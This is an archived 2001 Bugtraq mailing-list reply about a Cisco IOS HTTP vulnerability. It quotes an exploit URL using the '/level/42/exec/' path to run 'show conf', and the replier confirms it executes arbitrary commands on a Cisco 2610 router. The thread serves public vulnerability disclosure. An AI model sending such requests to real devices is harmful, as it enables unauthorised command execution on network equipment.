[21327] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: Cisco device HTTP exploit...

daemon@ATHENA.MIT.EDU (Grzegorz Krawczyk)
Tue Jul 3 15:31:26 2001

Date: Tue, 3 Jul 2001 09:14:06 +0200 (CEST)
From: Grzegorz Krawczyk <krawiec@saturn.expro.pl>
To: bugtraq@securityfocus.com
In-Reply-To: <Pine.LNX.3.96.1010702134611.22995B-100000@Lib-Vai.lib.asu.edu>
Message-ID: <Pine.LNX.4.21.0107030911370.13780-100000@saturn.expro.pl>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

> A malicious user could use:
> 
> http://169.254.0.15/level/42/exec/show%20conf
I've tested it on CISCO 2610 router with
IOS (tm) C2600 Software (C2600-I-M), Version 12.0(10), RELEASE SOFTWARE
(fc1)
It work.. You can exec any command..

Krawiec

home	help	back	first	fref	pref	prev	next	nref	lref	last	post